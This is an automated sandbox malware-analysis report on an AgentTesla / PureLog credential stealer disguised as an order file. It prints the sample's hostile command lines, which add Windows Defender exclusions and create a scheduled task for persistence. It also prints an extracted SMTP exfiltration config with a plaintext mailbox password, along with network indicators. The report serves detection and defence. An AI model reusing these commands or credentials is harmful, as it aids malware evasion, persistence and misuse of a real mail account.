Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order 19A20060.exe

Overview

General Information

Sample name:Order 19A20060.exe
Analysis ID:1399297
MD5:3c162b1caa9b65084775199af23b06de
SHA1:4b401eebfab0a021d242ce7a1ff9c044d9813d10
SHA256:5857b336d7d9853e12a8396380a452b1ea5c390a0409fb58ee6e7e77d9aabe00
Tags:AgentTeslaexeRFQ
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Order 19A20060.exe (PID: 7420 cmdline: C:\Users\user\Desktop\Order 19A20060.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • powershell.exe (PID: 7604 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7656 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7692 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Order 19A20060.exe (PID: 7872 cmdline: C:\Users\user\Desktop\Order 19A20060.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
  • SgJzugoOJvLgL.exe (PID: 7964 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • schtasks.exe (PID: 7188 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SgJzugoOJvLgL.exe (PID: 3332 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • SgJzugoOJvLgL.exe (PID: 3548 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • SgJzugoOJvLgL.exe (PID: 1236 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Order 19A20060.exe.3190e28.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                9.2.SgJzugoOJvLgL.exe.289658c.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  9.2.SgJzugoOJvLgL.exe.2590e50.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Order 19A20060.exe.349648c.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.Order 19A20060.exe.347842c.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 35 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, ProcessId: 7604, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, ProcessId: 7604, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe, ParentImage: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe, ParentProcessId: 7964, ParentProcessName: SgJzugoOJvLgL.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp, ProcessId: 7188, ProcessName: schtasks.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Order 19A20060.exe, Initiated: true, ProcessId: 7872, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, ProcessId: 7692, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, ProcessId: 7604, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, ProcessId: 7692, ProcessName: schtasks.exe
                        Timestamp:02/27/24-10:09:05.706606
                        SID:2851779
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:05.706606
                        SID:2855542
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:05.706606
                        SID:2855245
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:05.706606
                        SID:2840032
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:05.706606
                        SID:2030171
                        Source Port:49739
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:03.953321
                        SID:2851779
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:03.953263
                        SID:2030171
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:03.953321
                        SID:2855542
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:03.953321
                        SID:2855245
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:02/27/24-10:09:03.953321
                        SID:2840032
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeReversingLabs: Detection: 68%
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeVirustotal: Detection: 37%Perma Link
                        Source: Order 19A20060.exeReversingLabs: Detection: 68%
                        Source: Order 19A20060.exeVirustotal: Detection: 37%Perma Link
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJoe Sandbox ML: detected
                        Source: Order 19A20060.exeJoe Sandbox ML: detected
                        Source: Order 19A20060.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: Order 19A20060.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: TBIu.pdbSHA2569 source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr
                        Source: Binary string: TBIu.pdb source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 4x nop then jmp 0AC0019Dh0_2_0AC0080D

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 50.87.139.143 50.87.139.143
                        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ipify.org
                        Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                        Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                        Source: Order 19A20060.exe, 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elec-qatar.com
                        Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                        Source: Order 19A20060.exe, 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 00000009.00000002.1714009771.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: Order 19A20060.exe, 00000000.00000002.1681895785.0000000005C10000.00000004.00000020.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, K6jmfEUYzg.cs.Net Code: aft6g33EiG
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, K6jmfEUYzg.cs.Net Code: aft6g33EiG
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWindow created: window name: CLIPBRDWNDCLASS

                        System Summary

                        barindex
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
